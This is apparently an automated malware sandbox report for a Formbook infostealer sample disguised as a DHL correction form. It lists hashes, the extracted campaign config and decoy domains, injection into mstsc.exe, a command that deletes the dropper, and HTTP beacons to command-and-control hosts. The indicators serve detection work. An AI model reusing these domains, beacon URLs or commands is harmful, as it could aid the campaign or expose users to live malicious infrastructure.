Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

10

DHL CORREC...RM.exe

windows7-x64

10

DHL CORREC...RM.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    148s
  • max time network
    144s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    16/01/2025, 07:28 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    DHL CORRECTION FORM.exe

  • Size

    247KB

  • MD5

    ba501476d5eed368c2975c5e9976ba41

  • SHA1

    535282f5234f5c48a05bcec25026fa32c4a05617

  • SHA256

    11c98c3bbf3f08f0d47153a819980189eacc20b3eaa44d2a88ec8a8aac17abda

  • SHA512

    630edacc8ae82d10f54168d3ab018f961c6c6c15fb1f68a227d6c716e38ea341430984105aaccb96cd20bf7810f883b8cb6073c82f8ab648dcc1a58409d8efa3

  • SSDEEP

    6144:69LI3rIbe7ixvQXf1G7Qtbfy1+D1NbWF6VomjoW3ziGQ:II76e7ixvuKQtbfy1GbWF6LjoWFQ

Score
10/10
formbookny03discoveryratspywarestealertrojan

Malware Config

Extracted

Family

formbook

Version

4.1

Campaign

ny03

Decoy

utori.rest

eguropag.lat

urtownnc.net

andr.xyz

ciencesphysiques-igis-cg.tech

valita.fun

ipraya168.cyou

iege.net

uired.xyz

jha28.win

ividcleaningservicesla.online

exsentials.store

leaning-services-50948.bond

nternet-providers-69016.bond

nline-advertising-40574.bond

eidmueller.cloud

wise.xyz

lasticdrawersorganizer.shop

luegrass.construction

awn77play.homes

Signatures

  • Formbook

    Formbook is a data stealing malware which is capable of stealing data.

    trojanspywarestealerformbook
  • Formbook family
    formbook
  • Formbook payload 2 IoCs
    rat
  • Suspicious use of SetThreadContext 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 62 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3520
    • C:\Users\Admin\AppData\Local\Temp\DHL CORRECTION FORM.exe
      "C:\Users\Admin\AppData\Local\Temp\DHL CORRECTION FORM.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      PID:4376
    • C:\Windows\SysWOW64\mstsc.exe
      "C:\Windows\SysWOW64\mstsc.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3096
      • C:\Windows\SysWOW64\cmd.exe
        /c del "C:\Users\Admin\AppData\Local\Temp\DHL CORRECTION FORM.exe"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:4604

Network

  • flag-us
    DNS
    209.205.72.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    209.205.72.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    22.160.190.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    22.160.190.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    7.98.22.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    7.98.22.2.in-addr.arpa
    IN PTR
    Response
    7.98.22.2.in-addr.arpa
    IN PTR
    a2-22-98-7deploystaticakamaitechnologiescom
  • flag-us
    DNS
    58.55.71.13.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    58.55.71.13.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    197.87.175.4.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    197.87.175.4.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    206.23.85.13.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    206.23.85.13.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    20.49.80.91.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    20.49.80.91.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    www.udrahotels.live
    Remote address:
    8.8.8.8:53
    Request
    www.udrahotels.live
    IN A
    Response
  • flag-us
    DNS
    www.halc.info
    Remote address:
    8.8.8.8:53
    Request
    www.halc.info
    IN A
    Response
    www.halc.info
    IN CNAME
    ext-sq.squarespace.com
    ext-sq.squarespace.com
    IN A
    198.49.23.144
    ext-sq.squarespace.com
    IN A
    198.185.159.144
    ext-sq.squarespace.com
    IN A
    198.49.23.145
    ext-sq.squarespace.com
    IN A
    198.185.159.145
  • flag-us
    GET
    http://www.halc.info/ny03/?9rz4X4d0=w/SQTW7+G142Z7KaXOQMyZk0SO1QkT1kWw0kpqSiblnC9ySkkTVeusiPbLujBQetxHqb&2dz=ETS4_86POxgX78y
    Explorer.EXE
    Remote address:
    198.49.23.144:80
    Request
    GET /ny03/?9rz4X4d0=w/SQTW7+G142Z7KaXOQMyZk0SO1QkT1kWw0kpqSiblnC9ySkkTVeusiPbLujBQetxHqb&2dz=ETS4_86POxgX78y HTTP/1.1
    Host: www.halc.info
    Connection: close
    Response
    HTTP/1.1 403 Forbidden
    Connection: close
    Server: Squarespace
    X-Contextid: OnQdCVBP/FghFPu3i
    X-Sqsp-Edge: true
    Date: Thu, 16 Jan 2025 07:29:06 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
  • flag-us
    DNS
    144.23.49.198.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    144.23.49.198.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    181.129.81.91.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    181.129.81.91.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    11.227.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    11.227.111.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    www.nfopointgestao.online
    Remote address:
    8.8.8.8:53
    Request
    www.nfopointgestao.online
    IN A
    Response
  • flag-us
    DNS
    133.130.81.91.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    133.130.81.91.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    www.wise.xyz
    Remote address:
    8.8.8.8:53
    Request
    www.wise.xyz
    IN A
    Response
    www.wise.xyz
    IN A
    76.223.54.146
    www.wise.xyz
    IN A
    13.248.169.48
  • flag-us
    GET
    http://www.wise.xyz/ny03/?9rz4X4d0=eZe+jsGIqIRctMV29zHFtPyQPZuCypS7zY1g0KjuV2TPvNtlf9nAgkOWGU2cTmwv3U0x&2dz=ETS4_86POxgX78y
    Explorer.EXE
    Remote address:
    76.223.54.146:80
    Request
    GET /ny03/?9rz4X4d0=eZe+jsGIqIRctMV29zHFtPyQPZuCypS7zY1g0KjuV2TPvNtlf9nAgkOWGU2cTmwv3U0x&2dz=ETS4_86POxgX78y HTTP/1.1
    Host: www.wise.xyz
    Connection: close
    Response
    HTTP/1.1 200 OK
    content-type: text/html
    date: Thu, 16 Jan 2025 07:29:47 GMT
    content-length: 212
    connection: close
  • flag-us
    DNS
    146.54.223.76.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    146.54.223.76.in-addr.arpa
    IN PTR
    Response
    146.54.223.76.in-addr.arpa
    IN PTR
    a904c694c05102f30awsglobalacceleratorcom
  • flag-us
    DNS
    www.ipraya168.cyou
    Remote address:
    8.8.8.8:53
    Request
    www.ipraya168.cyou
    IN A
    Response
  • flag-us
    DNS
    www.eidmueller.cloud
    Remote address:
    8.8.8.8:53
    Request
    www.eidmueller.cloud
    IN A
    Response
  • 198.49.23.144:80
    http://www.halc.info/ny03/?9rz4X4d0=w/SQTW7+G142Z7KaXOQMyZk0SO1QkT1kWw0kpqSiblnC9ySkkTVeusiPbLujBQetxHqb&2dz=ETS4_86POxgX78y
    http
    Explorer.EXE
    444 B
     2.5kB
     6
    6

    HTTP Request

    GET http://www.halc.info/ny03/?9rz4X4d0=w/SQTW7+G142Z7KaXOQMyZk0SO1QkT1kWw0kpqSiblnC9ySkkTVeusiPbLujBQetxHqb&2dz=ETS4_86POxgX78y

    HTTP Response

    403
  • 76.223.54.146:80
    http://www.wise.xyz/ny03/?9rz4X4d0=eZe+jsGIqIRctMV29zHFtPyQPZuCypS7zY1g0KjuV2TPvNtlf9nAgkOWGU2cTmwv3U0x&2dz=ETS4_86POxgX78y
    http
    Explorer.EXE
    397 B
     505 B
     5
    4

    HTTP Request

    GET http://www.wise.xyz/ny03/?9rz4X4d0=eZe+jsGIqIRctMV29zHFtPyQPZuCypS7zY1g0KjuV2TPvNtlf9nAgkOWGU2cTmwv3U0x&2dz=ETS4_86POxgX78y

    HTTP Response

    200
  • 8.8.8.8:53
    209.205.72.20.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    209.205.72.20.in-addr.arpa

  • 8.8.8.8:53
    22.160.190.20.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    22.160.190.20.in-addr.arpa

  • 8.8.8.8:53
    7.98.22.2.in-addr.arpa
    dns
    68 B
     129 B
     1
    1

    DNS Request

    7.98.22.2.in-addr.arpa

  • 8.8.8.8:53
    58.55.71.13.in-addr.arpa
    dns
    70 B
     144 B
     1
    1

    DNS Request

    58.55.71.13.in-addr.arpa

  • 8.8.8.8:53
    197.87.175.4.in-addr.arpa
    dns
    71 B
     157 B
     1
    1

    DNS Request

    197.87.175.4.in-addr.arpa

  • 8.8.8.8:53
    206.23.85.13.in-addr.arpa
    dns
    71 B
     145 B
     1
    1

    DNS Request

    206.23.85.13.in-addr.arpa

  • 8.8.8.8:53
    20.49.80.91.in-addr.arpa
    dns
    70 B
     145 B
     1
    1

    DNS Request

    20.49.80.91.in-addr.arpa

  • 8.8.8.8:53
    www.udrahotels.live
    dns
    65 B
     133 B
     1
    1

    DNS Request

    www.udrahotels.live

  • 8.8.8.8:53
    www.halc.info
    dns
    59 B
     159 B
     1
    1

    DNS Request

    www.halc.info

    DNS Response

    198.49.23.144
    198.185.159.144
    198.49.23.145
    198.185.159.145

  • 8.8.8.8:53
    144.23.49.198.in-addr.arpa
    dns
    72 B
     126 B
     1
    1

    DNS Request

    144.23.49.198.in-addr.arpa

  • 8.8.8.8:53
    181.129.81.91.in-addr.arpa
    dns
    72 B
     147 B
     1
    1

    DNS Request

    181.129.81.91.in-addr.arpa

  • 8.8.8.8:53
    11.227.111.52.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    11.227.111.52.in-addr.arpa

  • 8.8.8.8:53
    www.nfopointgestao.online
    dns
    71 B
     136 B
     1
    1

    DNS Request

    www.nfopointgestao.online

  • 8.8.8.8:53
    133.130.81.91.in-addr.arpa
    dns
    72 B
     147 B
     1
    1

    DNS Request

    133.130.81.91.in-addr.arpa

  • 8.8.8.8:53
    www.wise.xyz
    dns
    58 B
     90 B
     1
    1

    DNS Request

    www.wise.xyz

    DNS Response

    76.223.54.146
    13.248.169.48

  • 8.8.8.8:53
    146.54.223.76.in-addr.arpa
    dns
    72 B
     128 B
     1
    1

    DNS Request

    146.54.223.76.in-addr.arpa

  • 8.8.8.8:53
    www.ipraya168.cyou
    dns
    64 B
     129 B
     1
    1

    DNS Request

    www.ipraya168.cyou

  • 8.8.8.8:53
    www.eidmueller.cloud
    dns
    66 B
     131 B
     1
    1

    DNS Request

    www.eidmueller.cloud

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/3096-4-0x0000000000940000-0x0000000000A7A000-memory.dmp

    Filesize

    1.2MB

    Download

  • memory/3096-6-0x0000000000940000-0x0000000000A7A000-memory.dmp

    Filesize

    1.2MB

    Download

  • memory/3096-7-0x0000000000330000-0x000000000035F000-memory.dmp

    Filesize

    188KB

    Download

  • memory/3520-3-0x00000000089C0000-0x0000000008B5E000-memory.dmp

    Filesize

    1.6MB

    Download

  • memory/3520-8-0x00000000089C0000-0x0000000008B5E000-memory.dmp

    Filesize

    1.6MB

    Download

  • memory/3520-12-0x0000000008C90000-0x0000000008E0B000-memory.dmp

    Filesize

    1.5MB

    Download

  • memory/3520-13-0x0000000008C90000-0x0000000008E0B000-memory.dmp

    Filesize

    1.5MB

    Download

  • memory/3520-15-0x0000000008C90000-0x0000000008E0B000-memory.dmp

    Filesize

    1.5MB

    Download

  • memory/4376-0-0x00000000012E0000-0x000000000162A000-memory.dmp

    Filesize

    3.3MB

    Download

  • memory/4376-2-0x0000000000570000-0x00000000005AF000-memory.dmp

    Filesize

    252KB

    Download

  • memory/4376-1-0x000000000058F000-0x0000000000590000-memory.dmp

    Filesize

    4KB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.